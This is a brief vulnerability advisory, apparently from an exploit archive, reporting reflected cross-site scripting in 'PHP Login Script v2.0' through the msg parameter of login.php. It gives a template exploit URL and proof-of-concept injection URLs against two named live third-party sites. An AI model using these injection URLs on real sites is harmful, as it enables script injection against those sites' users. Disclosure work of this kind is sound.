[+] Cross Site Scripting on PHP Login Script v2.0 [+] Date: 24/03/2014 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://php-login-script.com/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vulnerable File: login.php [+] Version: v2.0 [+] Exploit : http://host/patch/login.php?msg=[XSS] [+] PoC : http://tkenu.com/login/login.php?msg=<marquee>Xss%20By%20Felipe</marquee> http://www.natpcs.com.au/admin/login.php?msg=<marquee>Xss By Felipe</marquee>